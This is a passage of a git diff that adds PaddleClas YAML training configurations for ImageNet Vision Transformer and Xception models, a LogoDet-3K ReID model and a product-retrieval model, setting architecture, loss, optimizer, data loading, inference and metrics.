save_inference_dir: ./inference + +# model architecture +Arch: + name: ViT_huge_patch32_384 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 384 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 384 + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 384 + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - 
TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_large_patch16_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_large_patch16_224.yaml new file mode 100644 index 0000000..74a6f40 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_large_patch16_224.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ViT_large_patch16_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - 
NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_large_patch16_384.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_large_patch16_384.yaml new file mode 100644 index 0000000..81abc1b --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_large_patch16_384.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 384, 384] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ViT_large_patch16_384 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + 
cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 384 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 384 + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 384 + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_large_patch32_384.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_large_patch32_384.yaml new file mode 100644 index 0000000..933fd7a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_large_patch32_384.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + 
eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 384, 384] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ViT_large_patch32_384 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 384 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 384 + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 384 + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + - ToCHWImage: + 
PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_small_patch16_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_small_patch16_224.yaml new file mode 100644 index 0000000..eea4922 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_small_patch16_224.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ViT_small_patch16_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: 
./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception41.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception41.yaml new file mode 100644 index 0000000..76dd776 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception41.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 299, 299] + save_inference_dir: ./inference + +# model architecture +Arch: + name: Xception41 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: 
ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 299 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception41_deeplab.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception41_deeplab.yaml new file mode 100644 index 0000000..a580fd3 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception41_deeplab.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + 
save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 299, 299] + save_inference_dir: ./inference + +# model architecture +Arch: + name: Xception41_deeplab + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 299 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' 
+ - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception65.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception65.yaml new file mode 100644 index 0000000..c94b285 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception65.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 299, 299] + save_inference_dir: ./inference + +# model architecture +Arch: + name: Xception65 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 299 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - 
DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception65_deeplab.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception65_deeplab.yaml new file mode 100644 index 0000000..bba5cee --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception65_deeplab.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 299, 299] + save_inference_dir: ./inference + +# model architecture +Arch: + name: Xception65_deeplab + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: 
./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 299 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception71.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception71.yaml new file mode 100644 index 0000000..bda7ecf --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception71.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + 
eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 299, 299] + save_inference_dir: ./inference + +# model architecture +Arch: + name: Xception71 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.0225 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 299 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 32 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + 
order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/Logo/ResNet50_ReID.yaml b/Smart_container/PaddleClas/ppcls/configs/Logo/ResNet50_ReID.yaml new file mode 100644 index 0000000..fa52193 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/Logo/ResNet50_ReID.yaml @@ -0,0 +1,151 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: "./output/" + device: "gpu" + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: "./inference" + eval_mode: "retrieval" + +# model architecture +Arch: + name: "RecModel" + infer_output_key: "features" + infer_add_softmax: False + Backbone: + name: "ResNet50_last_stage_stride1" + pretrained: True + BackboneStopLayer: + name: "adaptive_avg_pool2d_0" + Neck: + name: "VehicleNeck" + in_channels: 2048 + out_channels: 512 + Head: + name: "CircleMargin" + margin: 0.35 + scale: 64 + embedding_size: 512 + class_num: 3000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + - PairwiseCosface: + margin: 0.35 + gamma: 64 + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.04 + regularizer: + name: 'L2' + coeff: 0.0001 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: LogoDataset + image_root: "dataset/LogoDet-3K-crop/train/" + cls_label_path: "dataset/LogoDet-3K-crop/LogoDet-3K+train.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AugMix: + prob: 0.5 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: 
[0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.5 + sampler: + name: PKSampler + batch_size: 128 + sample_per_id: 2 + drop_last: True + + loader: + num_workers: 6 + use_shared_memory: True + Eval: + Query: + dataset: + name: LogoDataset + image_root: "dataset/LogoDet-3K-crop/val/" + cls_label_path: "dataset/LogoDet-3K-crop/LogoDet-3K+val.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 8 + use_shared_memory: True + + Gallery: + dataset: + name: LogoDataset + image_root: "dataset/LogoDet-3K-crop/train/" + cls_label_path: "dataset/LogoDet-3K-crop/LogoDet-3K+train.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 8 + use_shared_memory: True + +Metric: + Eval: + - Recallk: + topk: [1, 5] + - mAP: {} + diff --git a/Smart_container/PaddleClas/ppcls/configs/Products/MV3_Large_1x_Aliproduct_DLBHC.yaml b/Smart_container/PaddleClas/ppcls/configs/Products/MV3_Large_1x_Aliproduct_DLBHC.yaml new file mode 100644 index 0000000..c9a8b7b --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/Products/MV3_Large_1x_Aliproduct_DLBHC.yaml @@ -0,0 +1,149 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output_dlbhc/ + device: gpu + save_interval: 